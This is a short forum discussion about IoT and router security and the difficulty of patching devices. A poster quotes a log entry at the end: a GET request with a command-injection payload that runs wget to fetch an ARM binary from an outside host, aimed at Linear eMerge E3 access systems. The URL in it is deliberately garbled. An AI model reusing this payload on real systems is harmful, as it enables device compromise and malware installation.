Forum Discussion
NetGear users...
MarkJFine wrote:Anything that has a web-based admin/configuration that can be done remotely (i.e., outside of the LAN) is technically vulnerable, and almost all of these devices are no matter how current the firmware is.
Remember that hack a few years back with the Blu Ray players and DVRs? Ugh.
Sure do.
Hackers can find a vulnerability in IoT devices faster than manufacturers can:
1. Detect it's there,
2. Fix it,
3. Post an update,
4. And most of all, have an end user actually update the device/install it.
The alternative to an addressable IoT box is to have an off-device cloud intermediary (which is better for us behind the double-NAT, btw) - depending upon how secure that cloud is kept. My Carrier thermostat is like that. However, most of the ones I see are complete disasters from a security aspect, including AmazonAWS, Google, and Microsoft. The ones hackers love are the ones like AmazonAWS that use dynamic IP addressing because they're hard to block.
Here's new one seen in today's logs, coming from a bunch of Telecom Italia static IPs:
GET /card_scan_decoder.php?No=30&door=%60wget htp://switchnets.net/hoho.arm7;This one specifically targets a vulnerability in Linear eMerge E3 access systems by inserting code from a Switchnets (Linode) server (again, grunged the http to htp).
